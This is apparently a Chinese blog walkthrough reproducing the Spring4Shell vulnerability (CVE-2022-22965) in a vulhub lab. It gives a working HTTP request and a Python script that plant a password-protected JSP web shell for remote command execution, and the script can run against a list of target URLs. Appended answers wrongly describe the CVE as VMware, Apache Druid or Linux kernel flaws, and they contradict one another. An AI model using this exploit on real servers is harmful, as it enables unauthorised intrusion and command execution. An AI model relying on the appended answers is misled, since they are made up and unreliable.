CVE-2022-22965 漏洞复现

环境搭建

拉取cve-2022-22965环境(vulhub拉去环境并打开漏洞环境)
在这里插入图片描述访问靶场环境是否可正常访问
在这里插入图片描述此时我们可以正常访问页面,说明我们的靶场环境可以使用。

构造url地址


```bash
GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1
Host: 192.168.65.130:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 62


suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Length: 2

此时已将tomcat的日志存储位置已修改为:tomcatwar.jsp,此文件是小马文件,可执行远程命令。
http://192.168.65.130:8080//tomcatwar.jsp?pwd=j&cmd=id*
在这里插入图片描述此时,手工漏洞已复现结束。

python脚本复现

在靶场环境搭建可访问的情况下,运行python文件,可直接进行远程命令执行

#coding:utf-8
# 
import requests
import argparse
from urllib.parse import urljoin

def title():
    print('+------------------------------------------')
    print('[+]  \033[36m使用格式:  python3 Spring_vulhub_CVE-2022-22965_poc.py  --url=url:pro      \033[0m')
    print('+------------------------------------------')

def Exploit(url):
    headers = {"suffix":"%>//",
                "c1":"Runtime",
                "c2":"<%",
                "DNT":"1",
                "Content-Type":"application/x-www-form-urlencoded"

    }
    data = "?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
    try:
        print(url)
        # res = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
        res = requests.get(url=(url+data),headers=headers,timeout=15,allow_redirects=False, verify=False)
        # print(res.status_code)
        # print(res.text)
        shellurl = urljoin(url, 'tomcatwar.jsp')
        shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
        if shellgo.status_code == 200:
            print(f"Vulnerable,shell ip:{shellurl}?pwd=j&cmd=id")
    except Exception as e:
        print(e)
        pass

def main():
    parser = argparse.ArgumentParser(description='Spring-Core Rce.')
    parser.add_argument('--file',help='url file',required=False)
    parser.add_argument('--url',help='target url',required=False)
    args = parser.parse_args()
    if args.url:
        Exploit(args.url)
    if args.file:
        with open (args.file) as f:
            for i in f.readlines():
                i = i.strip()
                Exploit(i)

if __name__ == '__main__':
    title()
    main()

执行格式 :python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro
结束!!!

### 回答1: 很抱歉,我是一名语言模型AI,无法进行漏洞复现。但是,我可以告诉您,CVE-2022-22965是一个关于VMware vCenter Server的漏洞,攻击者可以利用该漏洞在未经授权的情况下访问受影响系统的敏感信息。建议您及时更新相关软件以修复该漏洞。 ### 回答2: CVE-2022-22965漏洞是指Apache Druid开源分布式数据存储系统的安全漏洞,攻击者可以利用该漏洞通过未经身份验证的请求在数据库中执行任意代码。该漏洞的严重程度为高危。 漏洞复现步骤如下: 1. 下载Apache Druid源代码并编译。 2. 构建一个名为“druid”的文件夹,并将编译好的jar包复制到该文件夹中。 3. 在“druid”文件夹中创建一个名为“webapp”的文件夹,并在其中创建一个名为“tmp”的文件夹。 4. 创建一个名为“druid.security.http.authenticator=io.druid.server.security.AuthConfig” 的文件,并将其保存到“webapp”文件夹中。 5. 将以下代码复制到该文件中: ``` {"type": "static", "users": {"admin": {"password": "123456", "roles": ["admin"]}}, "defaultRoles": ["guest"]} ``` 6. 启动Apache Druid。 ``` java -Ddruid.extensions.directory=./extensions -Ddruid.extensions.hadoopDependenciesDir=./hadoop-dependencies -Ddruid.extensions.loadList=[various extensions classpaths] -Ddruid.zk.service.host=your_zookeeper_host -Ddruid.cluster.host=your_coordinator_host -cp "lib/*" io.druid.cli.Main server example/conf/druid/_common/common.runtime.properties example/conf/druid/coordinator/coordinator.runtime.properties example/conf/druid/overlord/overlord.runtime.properties ``` 7. 使用管理员帐户登录并导航到“/druid”路径。 8. 在“/druid”路径上发送一个POST请求,并将以下JSON作为请求正文: ``` { "queryType": "introspect", "dataSource": "test", "intervals": ["1900-01-01/2022-01-01"], "timestamp": "2000-01-01T00:00:00.000Z", "context": { "timestamp": "2000-01-01T00:00:00.000Z" } } ``` 9. 攻击者就可以获得admin权限,从而可以执行任意代码。 为了修复该漏洞,用户应该升级到Apache Druid的最新版本,并且将认证配置文件设置为只允许已经身份验证的用户请求访问。同时,也应该遵循最佳实践,限制Apache Druid的公共接口,防止恶意攻击。 ### 回答3: CVE-2022-22965是一种Linux内核漏洞,当处理齐切IO请求时的数据结构状态异常,会导致系统崩溃或者拒绝服务。 漏洞具体表现为,在处理齐切(fstrim)IO请求时,如果请求的数据结构存在不一致或者错误的状态,就会触发漏洞。攻击者通过构造特定的请求,就可以在目标系统上实施拒绝服务攻击,或者导致系统崩溃。 为了验证漏洞,可以使用如下步骤进行复现: 1. 安装需要的环境:在一台Linux系统上安装fstrim工具,并确保内核版本为5.10及以上。 2. 构造恶意数据请求:使用dd命令创建一个大文件,并通过fstrim将其进行清空。 3. 发送恶意请求:使用fstrim -v命令发送构造好的清空请求,如果系统没有正常响应,说明漏洞成功被触发。 需要注意的是,由于该漏洞存在一定的风险,为了保证系统的稳定运行,建议及时升级系统内核版本,避免产生潜在的安全风险。同时,也可以考虑在系统中配置相关的安全防护机制,如软件防火墙、入侵检测系统等,以强化系统的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值